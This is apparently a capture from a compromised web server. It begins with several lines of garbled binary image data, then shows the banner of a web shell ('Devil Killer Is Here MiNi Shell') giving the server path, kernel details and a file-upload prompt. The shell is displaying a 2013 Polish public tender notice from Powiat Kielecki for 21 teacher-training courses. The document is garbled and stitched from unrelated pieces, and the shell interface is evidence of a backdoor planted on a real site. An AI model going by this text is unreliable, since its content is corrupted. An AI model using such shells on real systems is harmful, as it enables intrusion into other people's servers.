JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130321/113792-N-2013.html

<p class="kh_header"><b>Kielce: Organizacja i realizacja szkoleń dla nauczycieli zatrudnionych w szkołach 
i placówkach oświatowych powiatu kieleckiego</b><br>
<b>Numer ogłoszenia: 113792 - 2013; data zamieszczenia: 21.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Kielecki - Starostwo Powiatowe w Kielcach , Al. IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 41 3421307, faks 41 3442825.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.powiat.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i realizacja szkoleń dla nauczycieli zatrudnionych w szkołach 
i placówkach oświatowych powiatu kieleckiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i realizacja szkoleń z następującej tematyki:część I Kurs Florystyka, część II Kurs Dekoracji Potraw, część III Kurs Barystyczny, część IV Kurs Barmański, część V Kurs organizacji imprez cateringowych, część VI Kurs integracji sensorycznej(I i II stopnia),część VII Biofeedback, część VIII Kurs Terapii poznawczej, część IX Kurs Interwencje w sytuacjach kryzysowych, część X Tablica interaktywna w nauczaniu przedmiotów humanistycznych, część XI Tablica interaktywna w nauczaniu przedmiotów przyrodniczych, część XII Tablica interaktywna w nauczaniu matematyki, część XIII Tablica interaktywna w nauczaniu hotelarstwa i gastronomii,część XIV Tablica interaktywna w nauczaniu przedsiębiorczości,część XV Animator Kultury,część XVI Praca z wychowankiem trudnym,część XVII Komunikacja nauczyciel  uczeń  jak poruszać tematy trudne, część XVIII Dobór metod i technik w pracy resocjalizacyjnej z młodzieżą,część XIX Wykorzystywanie usług plastycznych w pracy z młodzieżą, część XX  Wychowawca jako opiekun i nauczyciel wspomagający, część XXI Kurs kwalifikacyjny z doradztwa zawodowego.
Szkolenia odbywać się będą w miejscach wskazanych przez Zamawiającego na terenie Powiatu Kieleckiego.Kursy odbywać się będą w oparciu o opracowany przez Wykonawcę PROGRAM KURSU, załączony do oferty, obejmujący między innymi proponowane w opisach kursów minimalne zagadnienia. Wykonawca zobowiązuje się do przeprowadzenia kursu zgodnie z zamawianą tematyką, w podanym terminie i określonym przez Zamawiającego miejscu. Wykonawca w ramach realizacji zamówienia zobowiązany jest pokryć koszty organizacji kursu (wynagrodzenia trenerów zajęć praktycznych i ćwiczeniowych), koszt dowiezienia do miejsca realizacji kursu niezbędnych sprzętów specjalistycznych (dotyczy części I, II, III, IV) koniecznych do przeprowadzenia zaproponowanego kursu, przygotowanie i powielenie materiałów dydaktycznych, przygotowania podręczników, jeśli są niezbędne do przeprowadzenia szkolenia. Wykonawca musi posiadać: 
stosowne uprawnienia branżowe ( dotyczy części II, III, IV, VI,VIII IX) 
akredytację Kuratora Oświaty określoną w art. 68b ustawy o systemie oświaty z dnia 7 września 1991 r. (Dz. U. 2004.256.2572)  dotyczy części X, XI, XII, XIII, XIV, XV, XVI, XVII, XVIII, XIX, XX, XXI  lub wpis do rejestru instytucji szkoleniowych.
Z Wykonawcą, którego oferty wygrały może być zawarte kilka umów.
Zajęcia odbywać się będą w godzinach 10 do 20 i nie mogą trwać dłużej niż 8 godzin lekcyjnych dziennie (godzina lekcyjna  45 minut).
2. Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku Nr 1 do SIWZ  Opis przedmiotu zamówienia.
3. Warunki i sposób realizacji przedmiotu zamówienia zostały określone we Wzorze Umowy stanowiącym Załącznik Nr 5 do SIWZ. 
4. Wykonawca zapewni: infrastrukturę szkoleniową (niezbędny sprzęt specjalistyczny w przypadku części I, II, III, IV), materiały szkoleniowe (dla uczestników szkolenia plus jeden do celów archiwizacji) w formie papierowej i elektronicznej powinny być oznakowane zgodni z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. Przed oznaczeniem Wykonawca musi uzyskać akceptację wzoru naklejki przez Zamawiającego, w trakcie szkoleń obsługę informatyczną infrastruktury szkoleniowej,prowadzenie i przedstawienie Zamawiającemu po zakończeniu kursu, następujących dokumentów prawidłowo oznakowanych zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki:lista obecności z własnoręcznymi podpisami uczestników kursu w każdym dniu zajęć,  program kursu oraz dziennik zajęć, potwierdzenia odbioru materiałów szkoleniowych,kopia protokołu z egzaminu (jeśli jest w programie) potwierdzającego przeprowadzenie egzaminu dla nauczycieli uczestników kursu, raport o zrealizowaniu usługi, imienne certyfikaty lub zaświadczenia o ukończeniu danego szkolenia, oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
5. Zamówienie jest współfinansowane z EFS w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.4 Wysoko wykwalifikowane kadry systemu oświaty, Projekt pt Nowoczesne Kadry Oświaty w Powiecie Kieleckim.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 21.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości: część pierwsza 500 PLN, część druga 200 PLN, część trzecia 300 PLN, część czwarta 400 PLN, część piąta 200 PLN, część szósta 500 PLN, część siódma 300 PLN, część ósma 200 PLN, część dziewiąta 200 PLN, część dziesiąta 200 PLN, część jedenasta 200 PLN, część dwunasta 200 PLN, część trzynasta 200 PLN, część czternasta 200 PLN, część piętnasta 300 PLN, część szesnasta 200 PLN, część siedemasta 200 PLN, część osiemnasta 200 PLN, część dziewiętnasta 200 PLN, część dwudziesta 200 PLN, część dwudziesta pierwsza 1000 PLN. Wadium wnosi się przed upływem terminu składania ofert. Wedle wyboru Wykonawcy wadium może być wniesione w: pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz. 275 z późn. zm.). Kserokopię dowodu wniesienia wadium, potwierdzoną za zgodność z oryginałem przez Wykonawcę z potwierdzeniem daty i godziny wpływu do kasy Zamawiającego należy załączyć do oferty zaś oryginał zdeponować w kasie Zamawiającego. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego: Bank Spółdzielczy w Kielcach Nr 52 8493 0004 0000 0057 2783 0008 z dopiskiem: Wadium w przetargu nieograniczonym na organizację i realizację szkoleń dla nauczycieli zatrudnionych w szkołach i placówkach oświatowych powiatu kieleckiego dla Części. Zamawiający uzna za skuteczne wniesione wadium w pieniądzu w momencie zaksięgowania kwoty wadium na rachunku Zamawiającego. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 9 i 10. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek wskazany przez Wykonawcę. Uwaga: Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. Zamawiający zwróci niezwłocznie wadium na pisemny wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli: Wykonawca, którego oferta zostanie wybrana odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie lub zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena sepłnienia tego warunku dokonywana będzie na podstawie oświadczenia, o spełnianiu warunków udziału w postępowaniu według zasady spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią Wykonawcy, którzy posiadają wiedzę i doświadczenie, przez co rozumie się należyte wykonanie, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w każdej z wymienionych XXI części co najmniej 3 usług polegających na przeprowadzeniu szkoleń z tematyki wskazanej w danym szkoleniu, a dotyczących szkoleń dla minimum liczby osób wskazanych w danym szkoleniu. Ocena sepłnienia tego warunku dokonywana będzie na podstawie wykazu usług według zasady spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena sepłnienia tego warunku dokonywana będzie na podstawie oświadczenia, o spełnianiu warunków udziału w postępowaniu według zasady spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla udokumentowania tego warunku Wykonawca musi dysponować:
W części I Kurs Florystyka co najmniej jedną osobą posiadającą:
1. udział w co najmniej 2 ogólnopolskich lub międzynarodowych konkursach lub wystawach florystycznych
2. doświadczenie w przeprowadzeniu co najmniej 2 kursów z florystyki.
W części II Kurs dekoracji potraw co najmniej jedną osobą posiadającą:
1. ukończony kurs carvingu I, II, III stopnia
2. co najmniej jeden dyplom za zajęcie 1, 2 lub 3 miejsca w ogólnopolskim lub międzynarodowym konkursie carvingu
3. doświadczenie w przeprowadzeniu co najmniej 2 kursów z carvingu.
W części III Kurs barystyczny co najmniej jedną osobą posiadającą:
1. dyplom trenera baristów
2. udział w co najmniej 2 ogólnopolskich lub międzynarodowych konkursach barystycznych
3. doświadczenie w przeprowadzeniu co najmniej 2 kursów barystycznych.
W części IV Kurs barmański co najmniej jedną osobą posiadającą:
1. dyplom masterbartendera
2. doświadczenie w przeprowadzeniu co najmniej 2 kursów barmańskich.
W części V Kurs organizacji imprez cateringowych co najmniej jedną osobą posiadającą:
1. wykształcenie zawodowe gastronomiczne 
2. doświadczenie w przeprowadzeniu co najmniej 2 kursów w zakresie organizacji imprez catringowych lub gastronomii.
W części VI Kurs integracji sensorycznej I i II stopnia co najmniej jedną osobą posiadającą:
1. wykształcenie psychologiczne lub pedagogiczne
2. licencję terapeuty integracji sensorycznej
3. doświadczenie w przeprowadzeniu co najmniej 2 kursów w zakresie integracji sensorycznej II stopnia.
W części VII Biofeedback co najmniej jedną osobą posiadającą:
1. poświadczenie co najmniej łącznej 5-letniej współpracy z co najmniej jedną instytucją prowadzącą badania kliniczne z zakresu Biofeedbacku
2. doświadczenie w przeprowadzeniu co najmniej 2 kursów w zakresie Biofeedbacku.
W części VIII Kurs terapii poznawczej co najmniej jedną osobą posiadającą:
1. certyfikat psychoterapeuty lub superwizora w terapii poznawczo behawioralnej 
2. doświadczenie w przeprowadzeniu co najmniej 2 kursów w zakresie terapii poznawczej.
W części IX Kurs interwencje w sytuacjach kryzysowych co najmniej jedną osobą posiadającą:
1. certyfikat psychoterapeuty lub superwizora w terapii poznawczo behawioralnej 
2. doświadczenie w przeprowadzeniu co najmniej 2 kursów w zakresie interwencji 
w sytuacji kryzysowej.
W części X Tablica interaktywna w nauczaniu przedmiotów humanistycznych
co najmniej jedną osobą posiadającą:
1. wykształcenie wyższe kierunkowe z przygotowaniem pedagogicznym
2. kwalifikacje do nauczania informatyki ( min. kurs, studia podyplomowe)
3. doświadczenie przeprowadzenia min. 1 kursu z nauczycielami w wymiarze min. 20 godzin dydaktycznych z wykorzystaniem tablicy interaktywnej.
W części XI Tablica interaktywna w nauczaniu przedmiotów przyrodniczych co najmniej jedną osobą posiadającą: 
1. wykształcenie wyższe kierunkowe z przygotowaniem pedagogicznym
2. kwalifikacje do nauczania informatyki ( min. kurs, studia podyplomowe)
3. doświadczenie przeprowadzenia min. 1 kursu z nauczycielami w wymiarze min. 20 godzin dydaktycznych z wykorzystaniem tablicy interaktywnej.
W części XII Tablica interaktywna w nauczaniu matematyki co najmniej jedną osobą posiadającą: 
1. wykształcenie wyższe matematyczne z przygotowaniem pedagogicznym
2. kwalifikacje do nauczania informatyki ( min. kurs, studia podyplomowe)
3. doświadczenie przeprowadzenia min. 1 kursu z nauczycielami w wymiarze min. 20 godzin dydaktycznych z wykorzystaniem tablicy interaktywnej.
W części XIII Tablica interaktywna w nauczaniu hotelarstwa i gastronomii co najmniej jedną osobą posiadającą: 
1. wykształcenie wyższe kierunkowe z przygotowaniem pedagogicznym
2. kwalifikacje do nauczania informatyki ( min. kurs, studia podyplomowe)
3. doświadczenie przeprowadzenia min. 1 kursu z nauczycielami w wymiarze min. 20 godzin dydaktycznych z wykorzystaniem tablicy interaktywnej.
W części XIV Tablica interaktywna w nauczaniu przedsiębiorczości co najmniej jedną osobą posiadającą: 
1. wykształcenie wyższe kierunkowe z przygotowaniem pedagogicznym
2. kwalifikacje do nauczania informatyki ( min. kurs, studia podyplomowe)
3. doświadczenie przeprowadzenia min. 1 kursu z nauczycielami w wymiarze min. 20 godzin dydaktycznych z wykorzystaniem tablicy interaktywnej.
W części XV Animator kultury co najmniej jedną osobą posiadającą: 
1. wykształcenie wyższe kierunkowe z przygotowaniem pedagogicznym
2. doświadczenie przeprowadzenia min. 1 kursu z nauczycielami w wymiarze min. 20 godzin dydaktycznych
W części XVI Praca z wychowankiem trudnym co najmniej jedną osobą posiadającą: 
1. wykształcenie wyższe pedagogiczne lub psychologiczne 
2. doświadczenie przeprowadzenia min. 1 kursu z nauczycielami w wymiarze min. 20 godzin dydaktycznych
3. doświadczenie w przeprowadzeniu co najmniej 1 kursu z komunikacji interpersonalnej, resocjalizacji lub socjoterapii.
Powyższe doświadczenie można łączyć o ile będą spełnione wszystkie wymagania.
W części XVII Komunikacja nauczyciel uczeń jak poruszać tematy trudne co najmniej jedną osobą posiadającą: 
1. wykształcenie wyższe pedagogiczne lub psychologiczne 
2. doświadczenie przeprowadzenia min. 1 kursu z nauczycielami w wymiarze min. 20 godzin dydaktycznych
3.doświadczenie w przeprowadzeniu co najmniej 1 kursu z komunikacji interpersonalnej, resocjalizacji lub socjoterapii.
Powyższe doświadczenie można łączyć o ile będą spełnione wszystkie wymagania.
W części XVIII Dobór metod i technik w pracy resocjalizacyjnej z młodzieżą co najmniej jedną osobą posiadającą: 
1. wykształcenie wyższe pedagogiczne lub psychologiczne 
2. doświadczenie przeprowadzenia min. 1 kursu z nauczycielami w wymiarze min. 20 godzin dydaktycznych
3. doświadczenie w przeprowadzeniu co najmniej 1 kursu z komunikacji interpersonalnej, resocjalizacji lub socjoterapii.
Powyższe doświadczenie można łączyć o ile będą spełnione wszystkie wymagania.
W części XIX Wykorzystanie usług plastycznych w pracy z młodzieżą co najmniej jedną osobą posiadającą: 
1. wykształcenie wyższe kierunkowe 
2. doświadczenie w przeprowadzeniu co najmniej 1 kursu z zakresu wykorzystania usług plastycznych.
W części XX Wychowawca jako opiekun i nauczyciel wspomagający co najmniej jedną osobą posiadającą: 
1. wykształcenie wyższe pedagogiczne lub psychologiczne 
2. co najmniej 2-letnie łączne doświadczeniem w pracy resocjalizacyjnej lub socjoterapeutycznej
3. doświadczenie przeprowadzenia min. 1 kursu z nauczycielami w wymiarze min. 20 godzin dydaktycznych
W części XXI Kurs kwalifikacyjny z doradztwa zawodowego co najmniej dziesięcioma osobami posiadającymi:
1. wykształcenie wyższe kierunkowe
2. doświadczenie przeprowadzenia szkolenia z nauczycielami w liczbie godzin min. 40 w tematyce modułów szkoleniowych zaproponowanych w ramach kursu.
Ocena sepłnienia tego warunku dokonywana będzie na podstawie wykazu osób według zasady spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena sepłnienia tego warunku dokonywana będzie na podstawie oświadczenia, o spełnianiu warunków udziału w postępowaniu według zasady spełnia nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Nie dotyczy</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w zakresie terminu realizacji zamówienia z przyczyn organizacyjnych - administracyjnych związanych np. z opóźniającą się procedurą przetargową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.powiat.kielce.pl<br>
